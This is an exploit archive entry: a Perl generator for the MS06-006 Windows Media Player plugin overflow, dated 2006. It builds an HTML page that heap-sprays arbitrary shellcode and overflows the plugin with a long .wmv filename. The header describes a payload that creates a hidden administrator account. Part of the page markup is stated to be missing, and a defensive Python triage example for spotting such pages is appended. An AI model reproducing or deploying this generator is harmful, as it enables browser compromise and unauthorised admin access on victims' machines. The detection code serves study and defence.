Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
# The usage of this tool is as follows:
# [shellcode]
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a 
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
# The standard disclaimer from the original exploit still applies, with some 
# changes:
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or 
# are explicitly authorized to test.
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.

$part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape(\"";

# The markup that closed the script block and wrapped the long filename is
# not present in this copy of the page; only the BODY tag survived, and
# $part3 is left empty rather than reconstructed.
$part2 =
"<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">";

$part3 =
"";

if (@ARGV != 1) {
    print STDERR "Usage: $0 [shellcode file]\n";
    exit 1;
}

open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html' for writing.";
print EXPLOIT $part1;

# The shellcode is emitted as JavaScript %uXXXX units: two bytes per unit,
# low byte first, and a lone trailing byte padded to a full unit as %u00xx.
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
binmode(SHELLCODE);
while (!eof(SHELLCODE)) {
    $ch1 = getc(SHELLCODE);
    if (eof(SHELLCODE)) {
        print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
    } else {
        $ch2 = getc(SHELLCODE);
        print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
    }
}
close(SHELLCODE);

print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAA\x05";
print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3;
close(EXPLOIT);

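From the analyst's side, the three things this generator leaves in a page (the %u little-endian byte encoding, the self-doubling spray loop up to 0x1000000 units, and a media filename padded to thousands of characters) are exactly what to look for when triaging a captured HTML sample. The following Python is an added example, not part of the original exploit or its author's code: it decodes a %u literal back to bytes and flags those indicators on a constructed sample page (the SAMPLE_HTML, regexes and function names are this example's own).

```python
import re

# JavaScript's unescape() accepts %uXXXX units of one 16-bit code unit each.
UNIT_RE = re.compile(r"%u([0-9A-Fa-f]{4})")

# The generator emits "do { x += x; } while (x.length < N);" with N in hex.
SPRAY_LOOP_RE = re.compile(
    r"do\s*\{\s*(\w+)\s*\+=\s*\1\s*;\s*\}\s*while\s*\(\s*\1\.length\s*<\s*"
    r"(0x[0-9A-Fa-f]+|\d+)\s*\)", re.S)


def decode_unicode_escape(literal: str) -> bytes:
    """Invert the generator's encoding: %u4554 -> b'TE' (low byte first).
    An odd trailing byte was written as %u00xx, so it decodes to that byte
    followed by a 0x00 pad, which is kept so offsets match the page."""
    out = bytearray()
    for unit in UNIT_RE.findall(literal):
        out.append(int(unit[2:], 16))  # low byte
        out.append(int(unit[:2], 16))  # high byte
    return bytes(out)


def triage_html(html: str) -> dict:
    """Pull heap-spray indicators out of captured page text."""
    findings = {"spray_loop": False, "spray_target_units": None,
                "unescape_literals": 0, "sled_prefix": b"",
                "long_media_src": False}
    m = SPRAY_LOOP_RE.search(html)
    if m:
        findings["spray_loop"] = True
        findings["spray_target_units"] = int(m.group(2), 0)  # 16-bit units
    literals = re.findall(r'unescape\(\s*"([^"]*)"\s*\)', html)
    findings["unescape_literals"] = len(literals)
    if literals:  # first literal is the sled the loop doubles
        findings["sled_prefix"] = decode_unicode_escape(literals[0])[:8]
    # A media name padded with >1 KiB of filler before its extension
    findings["long_media_src"] = re.search(
        r"[^\"'\s<>]{1024,}\.wmv", html) is not None
    return findings


# Constructed sample modelled on the generator's output (not a captured page).
SAMPLE_HTML = (
    '<script>\nvar spray = unescape("%u4141%u4141%u4141%u4141");\n'
    'do {\nspray += spray;\n} while (spray.length < 0x1000000);\n'
    'spray += unescape("%u4554%u5453%u0021");\n</script>\n'
    '<embed src="' + "-" * 2038 + 'AAA.wmv">'
)
```

Running `triage_html(SAMPLE_HTML)` on the sample reports the loop, a 0x1000000-unit target, an 0x41 sled and the oversized .wmv name; real captures vary the variable names, so widen the regexes rather than relying on the page's `spray` identifier.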
----------------------------------------------- shellcode.hex -----------------------------------------


# [2006-02-22]